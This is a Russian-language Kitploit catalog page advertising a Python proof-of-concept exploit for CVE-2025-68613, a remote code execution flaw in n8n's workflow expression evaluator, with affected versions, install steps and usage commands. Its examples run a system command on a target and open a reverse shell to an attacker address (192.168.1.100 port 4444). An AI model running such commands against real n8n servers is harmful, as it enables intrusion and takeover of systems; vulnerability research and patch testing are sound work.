Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-68613-Python-Exploit — Python Exploit for CVE-2025-68613. | Kitploit
Инструменты/GitHubGitHub/johanneslks/cve-2025-68613-python-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubjohanneslks/cve-2025-68613-python-exploit

CVE-2025-68613-Python-Exploit

Python Exploit for CVE-2025-68613.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
16 месяцев назадЕщё не проверено

CVE-2025-68613: RCE в выражениях рабочего процесса n8n

Эксплойт Proof of Concept (PoC) для критической уязвимости удаленного выполнения кода в платформе автоматизации рабочих процессов n8n.


Описание

Уязвимость существует в системе оценки выражений n8n. Выражения, предоставляемые пользователем, недостаточно изолированы (sandbox), что позволяет аутентифицированным злоумышленникам выполнять произвольный код на хост-системе.

Идентификатор CVE: CVE-2025-68613
Тип уязвимости: Удаленное выполнение кода (RCE)
Компонент: Оценщик выражений


Затронутые версии

  • n8n >= 0.211.0
  • n8n < 1.120.4
  • n8n < 1.121.1
  • n8n < 1.122.0

Установка

root@kitploit:~
git clone https://github.com/JohannesLks/CVE-2025-68613-Python-Exploit.git
cd CVE-2025-68613-Python-Exploit
pip install -r requirements.txt

Использование

Синтаксис

root@kitploit:~
python3 n8n_exploit.py -t <TARGET> -u <USER> -p <PASSWORD> [OPTIONS]

Аргументы

  • -t, --target : Целевой URL (например, http://localhost:5678)
  • -u, --username : Адрес электронной почты учетной записи n8n
  • -p, --password : Пароль учетной записи n8n
  • -c, --cmd : Системная команда для выполнения
  • --reverse-shell : Запустить обратную оболочку (Формат: IP ПОРТ)

Примеры

Проверка уязвимости / Выполнение команды:

root@kitploit:~
python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" -c "id"

Установка обратной оболочки:

root@kitploit:~
python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" --reverse-shell 192.168.1.100 4444
Скачать инструмент